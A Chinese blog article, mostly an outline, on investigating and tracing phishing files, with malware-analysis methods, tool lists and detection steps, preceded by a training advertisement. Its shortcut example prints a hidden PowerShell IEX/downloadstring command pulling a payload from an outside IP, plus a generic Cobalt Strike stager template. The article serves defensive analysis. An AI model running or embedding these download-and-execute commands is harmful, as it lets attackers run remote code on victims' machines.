钓鱼文件应急溯源:方法篇
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
恶意软件分析技术的市场
常见的分析技术
-
静态恶意软件分析
-
动态恶意软件分析
-
混合恶意软件分析
常见的检测工具展示
网络分析工具
-
NetLimiter
-
CurrPorts
-
TeaPot
-
HTTPDebuger
行为监控工具
-
DiffView
-
火绒剑
-
Comodo
反编译与调试工具
-
GDA 与Frida
-
x64dbg
知识扩展
思路
恶意软件作者:使用高级语言编写恶意程序
计算机:CPU识别代码进行执行
恶意软件分析人员:通过反编译手段进行分析
发包函数
漏洞利用类钓鱼
模拟
真实背景利用案例
模拟分析
-
网络分析示例
请求地址-
http://192.168.86.144/word.cab
-
行为监控分析示例
-
解包查看
-
下载分析
-
解析
-
反汇编定位
溯源
-
埃文
-
BestTrace
-
备案、Whois、威胁情报查询系统
判断
-
后缀名与显示的logo
-
文件类型
-
hash
-
时间戳
-
邮件信息
-
打开判断
-
专业工具
-
扫描
-
代码分析
-
快捷方式
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://120.48.85.228:80/favicon’))”
常见的cs上线命令
powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring(‘’)
案例讲解
-
快捷方式
-
标题诱导
-
执行监控
网上分析示例
-
属性查看
-
反编译逐步分析
查杀
-
扫描查杀思路图
-
专业扫描工具
-
弱点扫描
总结
-
对于文件
-
内存层防护与监控
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/9173.html